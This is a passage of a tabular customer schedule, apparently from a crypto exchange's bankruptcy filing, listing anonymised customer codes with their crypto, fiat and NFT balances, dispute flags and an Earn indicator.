| 07351252 | | USD[10.00] | | |
| 07351253 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07351254 | | USD[10.00] | | |
| 07351255 | | USD[10.00] | | |
| 07351256 | | CUSDT[2], DOGE[.00475647], TRX[.79582495], USD[0.08] | Yes | |
| 07351257 | | USD[10.00] | | |
| 07351258 | | USD[10.00] | | |
| 07351259 | | USD[10.00] | | |
| 07351260 | | SHIB[3], USD[0.00] | Yes | |
| 07351261 | | USD[10.00] | | |
| 07351262 | | USD[10.00] | | |
| 07351263 | | USD[10.00] | | |
| 07351264 | | DOGE[1], USD[0.01] | | |
| 07351268 | | ETH[.00000139], ETHW[.00000139], USD[0.00] | Yes | |
| 07351269 | | USD[10.00] | | |
| 07351270 | | USD[10.00] | | |
| 07351271 | | CUSDT[1], DOGE[9914.54822403], ETH[.02383335], ETHW[.02353285], GRT[1.00019173], TRX[2], USD[0.04] | Yes | |
| 07351272 | | USD[10.00] | | |
| 07351273 | | GRT[7.0015928], USD[0.00] | | |
| 07351274 | | USD[0.18], USDT[0] | | |
| 07351275 | | CUSDT[1], DOGE[1036.25920602], USD[0.00] | | |
| 07351276 | | USD[10.00] | | |
| 07351277 | | USD[0.01] | Yes | |
| 07351278 | | USD[10.00] | | |
| 07351279 | | NFT (554094683479695374/Entrance Voucher #3915)[1], SHIB[939753.44721771], USD[0.00] | | |
| 07351280 | | CUSDT[1], USD[0.00] | | |
| 07351281 | | BAT[0], BTC[0], USD[0.01] | | |
| 07351282 | | CUSDT[5], DOGE[385.64037397], ETH[.01345186], ETHW[.0132877], USD[0.01] | Yes | |
| 07351284 | | DOGE[16.12249042], USD[0.00] | | |
| 07351285 | | TRX[1], USD[0.00] | Yes | |
| 07351287 | | USD[0.00] | | |
| 07351288 | | BRZ[4], CUSDT[6], DOGE[1], ETHW[1.10943326], GRT[1.00490019], LTC[.00631982], SUSHI[1.10846975], TRX[1], UNI[.0032537], USD[2478.24], USDT[2.21744548] | Yes | |
| 07351290 | | CUSDT[463.45345119], USD[0.00] | | |
| 07351291 | | LTC[.04757711], USD[0.00] | | |
| 07351292 | | BAT[0], BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], LTC[0], MATIC[0], SHIB[2], SOL[0], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07351293 | | USD[10.00] | | |
| 07351295 | | DOGE[2576.53570125], ETH[.00545268], ETHW[.00538428], USD[0.00] | Yes | |
| 07351296 | | BRZ[1], CUSDT[75.6140562], ETHW[1.05160222], SHIB[20], TRX[21.60226282], USD[514.95] | | |
| 07351297 | | SHIB[1], TRX[5.18274858], USD[46.49], USDT[2.10883903] | Yes | |
| 07351299 | | USD[0.02] | | |
| 07351300 | | USD[10.00] | | |
| 07351301 | | CUSDT[1], DOGE[.00002845], USD[0.00] | | |
| 07351303 | | CUSDT[1], SHIB[0], USD[0.00] | | |
| 07351306 | | USD[10.00] | | |
| 07351307 | | USD[10.00] | | |
| 07351308 | | USD[10.00] | | |
| 07351309 | | BAT[1], BRZ[1], CUSDT[8.81988198], DOGE[0], TRX[4], USD[0.00], USDT[0] | | |
| 07351310 | | CUSDT[3], DOGE[0.00000002], USD[0.00] | Yes | |
| 07351312 | | USD[10.00] | | |
| 07351313 | | USD[10.00] | | |
| 07351314 | | BAT[1], CUSDT[3], TRX[3], USD[0.01] | | |
| 07351315 | | USD[10.00] | | |
| 07351316 | | BTC[.00037828], CUSDT[8], DOGE[879.78366896], GRT[1.91262784], SHIB[10], TRX[2.83067584], USD[0.00] | Yes | |
| 07351317 | | BRZ[1], CUSDT[1], DOGE[9.95462559], TRX[1], USD[0.00] | | |
| 07351318 | | USD[10.00] | | |
| 07351319 | | USD[10.00] | | |
| 07351320 | | CUSDT[1], DOGE[881.0360103], USD[0.00], YFI[.00290359] | Yes | |
| 07351321 | | USD[0.00] | | |
| 07351322 | | USD[10.00] | | |
| 07351323 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07351324 | | USD[10.00] | | |
| 07351325 | | CUSDT[.00699164], DOGE[.18907301], TRX[2], USD[0.65] | | |
| 07351326 | | USD[10.00] | | |
| 07351328 | | DOGE[0], EUR[0.00], USD[0.00] | | |
| 07351329 | | BAT[248.37860513], BRZ[1], CUSDT[5378.13650662], DOGE[2127.34711728], ETH[.05234135], ETHW[.05169154], LINK[12.62772465], MKR[.03862844], SHIB[3782836.64116503], SOL[13.72622449], TRX[568.0913878], USD[3.49], YFI[.01544068] | Yes | |
| 07351330 | | DOGE[2.1801452], TRX[2], USD[0.01] | | |
| 07351331 | | BRZ[1], CUSDT[1], DOGE[1.00004359], TRX[9], USD[0.01] | | |
| 07351332 | | SUSHI[.68698175], USD[0.00] | | |
| 07351333 | | USD[10.00] | | |
| 07351334 | | USD[0.00] | | |
| 07351335 | | DOGE[1], USD[0.01] | | |
| 07351336 | | BTC[.00303318], ETH[0.48285627], SHIB[2350908.87474389], USD[0.00] | Yes | |
| 07351338 | | BAT[2.06659034], BCH[.00000876], BRZ[2], BTC[.05252455], CUSDT[9], DOGE[4], ETH[1.60940417], ETHW[1.60871354], GRT[.00101834], LINK[52.54544159], LTC[.00022067], SOL[11.77765764], TRX[3], USD[0.65], USDT[1.078398223], YFI[.02560849] | Yes | |
| 07351339 | | BTC[0.00000036], USD[0.00] | Yes | |
| 07351340 | | USD[10.00] | | |
| 07351341 | | DOGE[0], TRX[2], USD[0.00] | | |
| 07351342 | | BTC[.00010817], DOGE[4.19440245], ETH[.00195181], ETHW[.00192445], USD[0.00] | Yes | |
| 07351343 | | USD[10.00] | | |
| 07351344 | | DOGE[1.00002056], USD[0.00] | | |
| 07351345 | Contingent, Disputed | USD[105.83] | | |
| 07351347 | | BAT[33.53962847], BCH[.01971384], BRZ[1], BTC[.00071837], CUSDT[2], DOGE[1874.46269785], ETH[.01682579], ETHW[.01682579], GRT[.79826662], LINK[.35712534], LTC[.11436001], SOL[1.58609104], SUSHI[.69992714], TRX[326.25719712], USD[0.00], YFI[.00022084] | | |
| 07351348 | | DOGE[81.02896584], USD[11.00] | | |
| 07351349 | | USD[10.00] | | |
| 07351350 | | CUSDT[8], TRX[222.57153013], USD[0.00] | | |
| 07351351 | | USD[10.00] | | |
| 07351352 | | USD[10.00] | | |
| 07351353 | | USD[10.00] | | |
| 07351354 | | DOGE[2.34495651], USD[25.76] | | |
| 07351355 | | CUSDT[2], DOGE[6993.41967111], SOL[23.75422919], TRX[1], USD[0.01] | Yes | |
| 07351356 | | USD[10.00] | | |
| 07351357 | | CUSDT[1], DOGE[0], USD[0.00], USDT[1] | | |
| 07351358 | | USD[10.00] | | |
| 07351359 | | CUSDT[1], DOGE[1460.50650664], USD[0.00] | Yes | |
| 07351360 | | DOGE[2538.27830149], TRX[1], USD[0.00] | | |
| 07351362 | | BRZ[1], CUSDT[3], USD[0.00] | | |
| 07351363 | | DOGE[2], USD[0.00] | | |
| 07351364 | | BCH[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0] | | |
| 07351365 | | DOGE[3], USD[0.00] | | |
| 07351366 | | BTC[0], DOGE[55.86391964], USD[0.00] | | |
| 07351367 | | DOGE[0], SOL[13.77170762], USD[0.00], USDT[0] | | |
| 07351368 | | DOGE[.00742144], USD[0.00] | | |
| 07351369 | | USD[10.00] | | |
| 07351370 | | BRZ[1], CUSDT[1], DOGE[.12065599], USD[0.17] | | |
| 07351371 | | BTC[.00045192], CUSDT[7], DOGE[59.77579817], USD[0.00] | Yes | |
| 07351372 | | USD[10.00] | | |
| 07351373 | | USD[10.00] | | |
| 07351374 | | DOGE[533.47865927], USD[0.00] | | |
| 07351375 | | USD[10.00] | | |
| 07351376 | | USD[10.00] | | |
| 07351377 | | TRX[161.70311737], USD[0.00] | Yes | |
| 07351378 | | USD[10.00] | | |
| 07351379 | | USD[10.00] | | |
| 07351380 | | BCH[.018], BTC[.0006993], DOGE[309.585], SOL[1.098], UNI[.0992], USD[0.68] | | |
| 07351381 | | BTC[.00021681], CUSDT[3], DOGE[2592.00804879], ETH[.05774828], ETHW[.05774828], USD[0.00] | | |
| 07351383 | | BAT[1], BRZ[2], CUSDT[3], TRX[4], USD[0.07] | | |
| 07351384 | | USD[20.00] | | |
| 07351385 | | CUSDT[13], DOGE[1], LINK[0], SHIB[1], TRX[0], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07351386 | | USD[0.00] | | |
| 07351387 | | USD[10.00] | | |
| 07351388 | | USD[0.00] | | |
| 07351391 | | BAT[1], BTC[0], CUSDT[1], DOGE[0], ETH[0], TRX[1], USD[0.00] | | |
| 07351393 | | BRZ[1], CUSDT[1], TRX[1], USD[0.00] | | |
| 07351394 | | DOGE[1], USD[0.01] | | |
| 07351395 | | USD[10.00] | | |
| 07351396 | | DOGE[872.32625894], TRX[1], USD[0.00] | | |
| 07351398 | | TRX[1.67106454], USD[0.91] | | |
| 07351399 | | CUSDT[2], DOGE[1.79077347], TRX[1], USD[0.00] | | |
| 07351401 | | BRZ[1], CUSDT[11], DOGE[2.02033883], LTC[.00000145], SUSHI[.00000711], TRX[2.00303524], USD[0.06] | Yes | |
| 07351402 | | BAT[31.06372994], DOGE[2384.20247005], GRT[12.15746759], TRX[1], USD[0.00] | | |
| 07351403 | | BTC[.00659601], DOGE[.6928], ETH[.028981], ETHW[.028981], LTC[.259753], USD[0.52] | | |
| 07351405 | | USD[0.00] | | |
| 07351406 | | BTC[.00010891], DOGE[47.00507184], ETH[.00124293], ETHW[.00124293], PAXG[.00105671], USD[0.00] | | |
| 07351407 | | USD[0.00] | | |
| 07351408 | | USD[10.00] | | |
| 07351409 | | BTC[.1215416], NFT [329882654637299340/Swashbuckler 1288][1], NFT [349248586976933363/Swashbuckler 1610][1], NFT [396345029471517462/Swashbuckler 1997][1], NFT [416079474340405027/Swashbuckler 1208][1], NFT [419738063911332176/Swashbuckler 2439][1], NFT [466819794882583363/Swashbuckler 1235][1], NFT [515474008906186927/Swashbuckler 1933][1], NFT [525227378620180577/Swashbuckler 1318][1], NFT [552630285732061175/Swashbuckler 1747][1], NFT [552771486074996165/Swashbuckler 1878][1], SOL[0.23111394], SUSHI[585.6837149], USD[0.00] | | |
| 07351411 | | USD[0.00] | | |
| 07351412 | | USD[10.00] | | |
| 07351413 | | DOGE[3456.83191402], TRX[1], USD[0.00] | | |
| 07351414 | | DOGE[12], USD[0.00] | | |
| 07351415 | | BRZ[2], CUSDT[27], DOGE[143.8542074], SHIB[2], TRX[2], USD[35.71] | | |
| 07351416 | | USD[10.00] | | |
| 07351417 | | BRZ[3], CUSDT[2], DOGE[1], TRX[2], USD[0.01] | | |
| 07351419 | | USD[0.03] | | |
| 07351420 | | USD[11.00] | Yes | |
| 07351421 | | BRZ[1], CUSDT[1], DOGE[10916.86662581], ETH[1.54557662], ETHW[1.54492756], LINK[38.45681625], SOL[32.11795149], SUSHI[17.87555079], TRX[1], USD[0.00] | Yes | |
| 07351422 | | CUSDT[1], USD[0.01] | | |
| 07351423 | | USD[11.09] | Yes | |
| 07351424 | | BTC[0], DOGE[4.00051142], TRX[1], USD[0.00] | Yes | |
| 07351425 | | USD[0.00] | | |
| 07351426 | | CUSDT[3], DOGE[1], NFT [513809979780936592/Doak Walker's Playbook: Detroit Lions vs. Cleveland Browns - December 28, 1952 #51][1], TRX[2], USD[5.67] | Yes | |
| 07351427 | | CUSDT[2], DOGE[26.82082049], USD[0.00] | | |
| 07351428 | | BRZ[1], CUSDT[2], USD[0.00] | Yes | |
| 07351429 | | BRZ[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07351430 | | DOGE[3], USD[26.67] | | |
| 07351431 | | BAT[0], BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0.00000001], YFI[0] | | |
| 07351432 | | USD[10.00] | | |
| 07351433 | | USD[10.00] | | |
| 07351434 | | CUSDT[1.84166054], DOGE[4335.07441754], TRX[671.84604844], USD[0.00], USDT[1] | | |
| 07351435 | | USD[10.00] | | |
| 07351436 | | USD[10.00] | | |
| 07351437 | | USD[10.00] | | |
| 07351438 | | USD[10.00] | | |
| 07351439 | Contingent, Disputed | USD[10.00] | | |
| 07351440 | | DOGE[.00005266], USD[0.06] | | |
| 07351441 | | GRT[3.61406876], USD[0.64] | | |
| 07351442 | | USD[10.00] | | |
| 07351443 | | USD[10.00] | | |
| 07351444 | | CUSDT[1], DOGE[.0003687], USD[0.01] | | |
| 07351445 | | DOGE[801.95738787], USD[0.12] | | |
| 07351446 | | DOGE[0], USD[0.00] | | |
| 07351447 | | USD[13.54], USDT[0] | | |
| 07351448 | | BRZ[0], CUSDT[0], DOGE[1], SOL[0], UNI[0], USD[0.00] | | |
| 07351449 | | BRZ[1], BTC[.00808118], CUSDT[13], DOGE[.00422796], ETHW[.08197034], SHIB[2], TRX[3], USD[0.00] | Yes | |
| 07351450 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07351451 | | USD[10.00] | | |
| 07351452 | | USD[10.00] | | |
| 07351453 | | BTC[.00000022], USD[0.00] | | |
| 07351454 | | DOGE[358.9283394], USD[10.00] | | |
| 07351455 | | USD[3.80] | | |
| 07351456 | | USD[5.07] | | |
| 07351457 | | BRZ[0.00000006], GRT[0], USD[0.36] | Yes | |
| 07351458 | | CUSDT[2], TRX[1], USD[0.00], USDT[0] | | |
| 07351459 | | BAT[1], USD[0.00] | | |
| 07351460 | | CUSDT[1], DOGE[180.37834204], USD[8.93] | | |
| 07351461 | | CUSDT[4], DOGE[1], TRX[1], USD[0.01] | | |
| 07351462 | | CUSDT[1], DOGE[21825776], USD[0.01], USDT[1] | | |
| 07351463 | | DOGE[176.32868513], USD[0.00] | | |
| 07351465 | | DOGE[16.91258638], USD[0.00] | | |
| 07351466 | Contingent, Disputed | BAT[0], BCH[0], BTC[0], CUSDT[0], DAI[0], DOGE[0], ETH[0], LINK[0], LTC[0], PAXG[0], SGD[0.00], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0.00000006], YFI[0] | Yes | |
| 07351467 | | CUSDT[2], DOGE[.00004243], TRX[1], USD[29.83] | | |
| 07351468 | | NFT [434426916337491620/Warriors 75th Anniversary City Edition Diamond #175][1], NFT [552942535645873226/Warriors 75th Anniversary Icon Edition Diamond #200][1], USD[10.00] | | |
| 07351470 | | USD[10.00] | | |
| 07351471 | | USD[10.00] | | |
| 07351472 | | USD[10.00] | | |
| 07351473 | | USD[10.00] | | |
| 07351474 | | USD[10.00] | | |
| 07351475 | | USD[10.00] | | |
| 07351476 | Contingent, Disputed | USD[0.00], USDT[0] | | |
| 07351477 | | USD[10.00] | | |
| 07351478 | | USD[10.00] | | |
| 07351479 | | USD[10.00] | | |
| 07351480 | | CUSDT[3], DOGE[54.49618134], SUSHI[.000156], USD[0.00] | | |
| 07351481 | | USD[10.00] | | |
| 07351482 | | CUSDT[154.51086868], DOGE[24.4126154], USD[0.00] | | |
| 07351483 | | BRZ[1], DOGE[11268.92578153], USD[10.00] | | |
| 07351484 | | USD[10.00] | | |
| 07351485 | | BRZ[2], CUSDT[1], DOGE[2016.6398693], TRX[1], USD[0.40] | Yes | |
| 07351486 | | USD[10.00] | | |
| 07351488 | | USD[10.00] | | |
| 07351489 | | USD[10.00] | | |
| 07351490 | | USD[10.00] | | |
| 07351491 | | CUSDT[1], USD[0.01] | | |
| 07351492 | | DOGE[0], USD[0.00] | | |
| 07351493 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07351495 | | BRZ[2], CUSDT[1], TRX[1], USD[0.01] | | |
| 07351496 | | USD[10.00] | | |
| 07351497 | | ETH[0], GRT[0], LTC[0], SOL[0], USD[2.27], USDT[0] | | |
| 07351498 | | USD[10.00] | | |
| 07351499 | | CUSDT[2], DOGE[3098.60239054], ETH[.025206], ETHW[.025206], SHIB[75900.61842724], TRX[1], USD[0.00] | | |
| 07351500 | | USD[10.00] | | |
| 07351501 | | USD[10.00] | | |
| 07351502 | | USD[10.00] | | |
| 07351503 | | CUSDT[1], GRT[1], USD[0.00] | | |
| 07351504 | | USD[11.01] | Yes | |
| 07351505 | | USD[10.00] | | |
| 07351506 | | CUSDT[2], DOGE[2593.18029235], TRX[2], USD[0.00] | | |
| 07351507 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07351508 | | ETH[.00000006], ETHW[.00000006], SOL[.0000018], USD[0.00] | Yes | |
| 07351509 | | BTC[.00183763], CUSDT[4], DOGE[2205.55436988], SOL[.82940912], TRX[1], USD[0.00] | Yes | |
| 07351510 | | ETH[.00713968], SHIB[1], TRX[1], USD[0.00] | | |
| 07351511 | | USD[10.00] | | |
| 07351512 | | USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07351513 | | CUSDT[2], TRX[222.60376507], USD[4.29] | | |
| 07351514 | | DOGE[.702], USD[5.64] | | |
| 07351515 | | USD[10.00] | | |
| 07351517 | | USD[10.00] | | |
| 07351519 | | USD[10.00] | | |
| 07351520 | | BCH[0], BRZ[3], CUSDT[4], DOGE[4], GRT[3822.47206257], LINK[.00004605], TRX[1], USD[0.00] | Yes | |
| 07351521 | | DOGE[6478.29505028], TRX[800.25511639], USD[0.00] | Yes | |
| 07351522 | | BRZ[1], DOGE[1], SHIB[16380.54585152], SOL[3.65922909], USD[0.00], USDT[0.00000001] | | |
| 07351523 | | DOGE[24.2921558], USD[0.00], USDT[0] | | |
| 07351524 | | BAT[1], CUSDT[1], TRX[1], USD[0.00] | | |
| 07351525 | | USD[10.00] | | |
| 07351526 | | BRZ[1], BTC[.00000003], CUSDT[5], NFT [488618870733105531/Imola Ticket Stub #1251][1], NFT [527455990725032788/Barcelona Ticket Stub #1730][1], SHIB[1], TRX[2], USD[0.01] | Yes | |
| 07351527 | | CUSDT[1], DOGE[554.20957362], GRT[10.97935316], USD[0.00] | | |
| 07351529 | | USD[10.00] | | |
| 07351530 | | USD[10.00] | | |
| 07351531 | | USD[10.00] | | |
| 07351532 | | USD[10.00] | | |
| 07351533 | | CUSDT[2], TRX[2], USD[0.00], USDT[1] | | |
| 07351534 | | BAT[6.38241916], BRZ[2], BTC[0], CUSDT[2], DOGE[0], ETH[0.00000456], ETHW[0.00000456], SHIB[4], SUSHI[1.07126194], TRX[6], USD[0.00], USDT[18.73948200] | Yes | |
| 07351535 | | USD[10.00] | | |
| 07351536 | | USD[10.00] | | |
| 07351538 | | USD[10.00] | | |
| 07351539 | | USD[10.00] | | |
| 07351540 | | DOGE[.00008441], USD[0.00] | | |
| 07351541 | | USD[10.00] | | |
| 07351542 | | CUSDT[1], TRX[1], USD[0.01] | Yes | |
| 07351543 | | USD[59.84] | | |
| 07351544 | | BTC[0.00000614], USD[0.00] | | |
| 07351545 | | BRZ[1], CUSDT[1], SHIB[10.1826688], TRX[3], USD[0.00], USDT[0.05525200] | Yes | |
| 07351546 | | GRT[1], TRX[5], USD[0.01] | | |
| 07351547 | | DOGE[32.06380501], USD[2.55] | | |
| 07351548 | | USD[10.00] | | |
| 07351549 | | USD[10.00] | | |
| 07351550 | | BTC[0], DOGE[0] | | |
| 07351551 | | USD[10.00] | | |
| 07351552 | | CUSDT[1], DOGE[5709.52511556], USD[0.01] | | |
| 07351553 | | USD[6.78] | | |
| 07351554 | | USD[10.00] | | |
| 07351556 | | CUSDT[1], DOGE[1.02548573], TRX[2], USD[0.00] | | |
| 07351558 | | USD[10.00] | | |
| 07351559 | | BAT[4], BRZ[16], CUSDT[50], GRT[2], TRX[7], USD[20.01], USDT[1] | | |
| 07351560 | | USD[10.00] | | |
| 07351561 | | USD[10.00] | | |
| 07351562 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07351563 | | DOGE[1], ETH[.1782827], ETHW[.1782827], USD[0.00] | | |
| 07351564 | | USD[0.00] | | |
| 07351565 | | BAT[1], BRZ[1], DOGE[1.00008633], GRT[2], MATIC[485.88313676], SHIB[31545741.32492113], TRX[1], UNI[30.08782395], USD[0.01], USDT[1] | | |
| 07351566 | | TRX[1], USD[0.00], USDT[0] | | |
| 07351567 | | USD[10.00] | | |
| 07351568 | | BTC[0], DOGE[1], USD[0.00] | | |
| 07351569 | | USD[10.00] | | |
| 07351572 | | USD[10.00] | | |
| 07351573 | | BTC[0], DOGE[0], USD[0.00] | Yes | |
| 07351574 | | DOGE[0], ETH[0], USD[0.01] | | |
| 07351576 | | BAT[0], CUSDT[4], DOGE[132.52183947], USD[0.00] | | |
| 07351577 | | BCH[.01217761], BTC[.00658729], ETH[.07661738], ETHW[.0756668], TRX[1877.4785734], USD[14.12] | Yes | |
| 07351578 | | DOGE[134.36798473], USD[0.00] | | |
| 07351579 | | DOGE[1], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07351580 | | DOGE[1239.7756127], USD[0.00] | | |
| 07351581 | | CUSDT[1], DOGE[70.89370324], USD[0.00] | | |
| 07351582 | | USD[10.00] | | |
| 07351583 | | USD[10.00] | | |
| 07351584 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07351585 | | BAT[12.10393995], CUSDT[1], DOGE[902.48542687], ETH[.00221349], ETHW[.00221349], GRT[13.43830765], SHIB[205366.92223439], TRX[147.0040429], USD[0.00] | | |
| 07351586 | | CUSDT[25], DOGE[70.81996284], LINK[1.14560862], LTC[0], TRX[3], UNI[.64462967], USD[0.00] | Yes | |
| 07351587 | | USD[10.00] | | |
| 07351588 | | USD[20.00] | | |
| 07351589 | | CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07351590 | | CUSDT[6], ETH[0.01212044], ETHW[0.01196996], USD[0.00], USDT[11.3864462] | Yes | |
| 07351591 | | CUSDT[1], DOGE[17.81312035], USD[0.00] | | |
| 07351592 | | DOGE[5.18128877], SOL[.00001125], TRX[.00004827], USD[0.00] | | |
| 07351593 | | DOGE[1], USD[0.06] | Yes | |
| 07351594 | | USD[10.00] | | |
| 07351595 | | USD[10.00] | | |
| 07351596 | | USD[10.00] | | |
| 07351597 | | USD[10.00] | | |
| 07351598 | | CUSDT[117.47352968], TRX[56.69303195], USD[0.00] | | |
| 07351599 | | USD[10.00] | | |
| 07351600 | | DOGE[23.38699383], USD[0.88] | | |
| 07351601 | | USD[10.00] | | |
| 07351602 | | USD[10.00] | | |
| 07351603 | | USD[10.00] | | |
| 07351604 | | BRZ[0.00003070], ETH[0.00046992], ETHW[0.00046992], USD[0.00] | | |
| 07351605 | | USD[0.01] | | |
| 07351606 | | USD[10.00] | | |
| 07351607 | | BAT[0], BRZ[2], BTC[0], CUSDT[3], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.01], USDT[0], YFI[0] | Yes | |
| 07351608 | | USD[10.00] | | |
| 07351609 | | DOGE[1], USD[56.26] | | |
| 07351610 | | USD[10.00] | | |
| 07351611 | | BRZ[0], DOGE[1104.36197206], USD[0.00], USDT[0] | | |
| 07351612 | | USD[10.00] | | |
| 07351613 | | USD[10.00] | | |
| 07351614 | | CUSDT[1], GRT[5.87788607], TRX[1], USD[0.01] | | |
| 07351615 | | BRZ[3], CUSDT[2], DOGE[1], ETH[0], USD[0.00], USDT[2] | | |
| 07351616 | | USD[10.00] | | |
| 07351617 | | USD[10.00] | | |
| 07351618 | | USD[10.00] | | |
| 07351619 | | USD[10.00] | | |
| 07351620 | | USD[10.00] | | |
| 07351621 | | BRZ[0], DOGE[0], SOL[0], USD[0.03] | | |
| 07351622 | | USD[10.00] | | |
| 07351623 | | CUSDT[329.65253867], DOGE[.53524567], TRX[1], USD[-4.30] | | |
| 07351624 | | DOGE[144.37752065], USD[0.00] | | |
| 07351625 | | USD[0.00] | | |
| 07351626 | | USD[0.00] | | |
| 07351627 | | CUSDT[1], TRX[4], USD[0.02] | | |
| 07351628 | | BTC[.00000669], USD[0.00] | | |
| 07351629 | | USD[10.00] | | |
| 07351630 | | USD[0.30] | | |
| 07351631 | | CUSDT[9], DOGE[.38813647], GRT[1], TRX[3], USD[0.18] | | |
| 07351632 | | DOGE[1.00049659], GRT[3.50084663], USD[0.00] | | |
| 07351633 | | USD[10.00] | | |
| 07351634 | | USD[0.01] | | |
| 07351635 | | BTC[0], DOGE[0], USD[3.00] | Yes | |
| 07351636 | | BRZ[1], BTC[.01038592], CUSDT[7], DOGE[2676.01197376], GRT[1.00404471], TRX[8], USD[0.00] | Yes | |
| 07351637 | | USD[0.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07351639 | | BTC[0], DOGE[42926.7375231], SOL[1], TRX[1], USD[0.00], USDT[1] | | |
| 07351641 | | USD[10.00] | | |
| 07351642 | | BRZ[1], CUSDT[1], DOGE[1976.70036027], USD[0.00] | | |
| 07351643 | | BCH[0], DOGE[0], USD[0.00] | | |
| 07351644 | | USD[10.00] | | |
| 07351645 | | BRZ[0], BTC[0], DOGE[0], ETH[0], TRX[1], USD[0.00] | | |
| 07351646 | | USD[10.00] | | |
| 07351647 | | USDT[0.00001071] | | |
| 07351648 | | USD[6.96] | | |
| 07351649 | | USD[10.00] | | |
| 07351650 | | USD[10.00] | | |
| 07351651 | | BAT[2.1155812], BRZ[1], CUSDT[8], DOGE[714.15520525], GRT[1.00404471], TRX[11614.277521], USD[0.27], USDT[1.10151279] | Yes | |
| 07351652 | | DOGE[111.34922524], USD[10.00] | | |
| 07351655 | | BTC[.00021273], DOGE[3063.49653927], TRX[.96395246], USD[0.00] | | |
| 07351656 | | BTC[.00016858], DOGE[2], USD[0.00] | | |
| 07351657 | | CUSDT[3], DOGE[.44219673], USD[226.98] | | |
| 07351659 | Contingent, Disputed | BRZ[0], BTC[0.00000017], DAI[0], DOGE[0], ETH[0], GRT[0], LINK[0], MATIC[0], SHIB[2], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07351660 | | USD[10.00] | | |
| 07351661 | | BAT[1], BRZ[2], CUSDT[6], DOGE[1], GRT[1], TRX[1], USD[0.01] | | |
| 07351662 | | USD[0.00] | Yes | |
| 07351663 | | USD[0.00] | | |
| 07351664 | | BCH[0], BRZ[0.00000001], BTC[0], DAI[0], DOGE[0], ETH[0], GRT[0], TRX[0], UNI[0], USD[0.09], USDT[0] | Yes | |
| 07351665 | | CUSDT[1], DOGE[.00075756], USD[0.01] | | |
| 07351666 | | USD[10.00] | | |
| 07351667 | | BF_POINT[100], DOGE[5437.44363115], USD[0.02] | | |
| 07351668 | | USD[0.00] | | |
| 07351669 | | USD[0.00] | | |
| 07351670 | | BRZ[2], CUSDT[1], DOGE[.00000076], TRX[1], USD[10.00] | | |
| 07351671 | | USD[10.00] | | |
| 07351672 | | USD[10.00] | | |
| 07351673 | | CUSDT[1], ETH[0], USD[0.00] | | |
| 07351674 | | BRZ[2], CUSDT[8], DOGE[1127.1195337], TRX[2], USD[0.00] | | |
| 07351675 | | USD[10.00] | | |
| 07351676 | | BRZ[1], CUSDT[7], DOGE[0], ETH[0.00000031], ETHW[0.00000031], MATIC[0.48656884], SHIB[2], TRX[2], USD[0.03] | Yes | |
| 07351677 | | USD[0.01] | | |
| 07351678 | | USD[0.01] | | |
| 07351679 | | USD[10.00] | | |
| 07351680 | | USD[10.00] | | |
| 07351681 | | USD[10.00] | | |
| 07351682 | | BRZ[3], BTC[.00044081], CUSDT[3], DOGE[1050.86410118], LINK[.00001635], MATIC[145.38012351], SOL[2.25607931], TRX[2], USD[0.27], USDT[1] | | |
| 07351683 | | BRZ[3], CUSDT[1], TRX[1], USD[0.00] | | |
| 07351684 | | DOGE[.00009566], USD[0.01] | | |
| 07351685 | | USD[10.00] | | |
| 07351687 | | USD[10.00] | | |
| 07351688 | | DOGE[0.77511819], TRX[2], USD[0.01] | | |
| 07351689 | | DOGE[4663.88782505], TRX[1], USD[0.00] | | |
| 07351690 | | BRZ[1], CUSDT[10], DOGE[9480.91785517], ETH[.02465563], ETHW[.02435389], SHIB[14220554.33438859], SOL[88.01697078], TRX[6], USD[1055.77] | Yes | |
| 07351691 | | DOGE[0], USD[48.11] | Yes | |
| 07351692 | | USD[10.68] | Yes | |
| 07351693 | | CUSDT[2.00055034], TRX[.00000243], USD[0.01] | | |
| 07351694 | | BTC[0], CUSDT[1], USD[0.00], USDT[0] | | |
| 07351695 | | USD[10.00] | | |
| 07351696 | | CUSDT[1], USD[0.00] | | |
| 07351697 | | BRZ[1], DOGE[1.56066084], USD[0.01] | | |
| 07351698 | | USD[10.00] | | |
| 07351699 | | USD[10.00] | | |
| 07351700 | | USD[0.00] | | |
| 07351701 | | USD[10.00] | | |

